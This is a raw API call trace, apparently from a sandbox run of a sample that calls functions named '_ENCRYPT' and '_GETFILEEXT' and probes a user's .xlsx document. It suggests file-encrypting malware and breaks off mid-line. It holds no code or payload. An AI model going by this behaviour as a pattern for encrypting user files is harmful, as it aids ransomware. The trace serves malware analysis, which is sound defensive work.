[0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.090] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.091] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0180.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0180.092] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.092] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.093] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0180.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0180.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.094] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.094] CloseHandle (hObject=0x138) returned 1 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0180.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0180.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.098] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.098] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.099] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0180.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.099] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.099] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.099] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.099] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.099] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.099] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.099] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.099] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0xc1f13840, ftLastWriteTime.dwHighDateTime=0x1d599d6, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 0x90add8 [0180.100] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.101] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.101] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0xc1f13840, ftLastWriteTime.dwHighDateTime=0x1d599d6, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 0x90add8 [0180.101] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.101] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.xlsx\"", cchCount1=10, 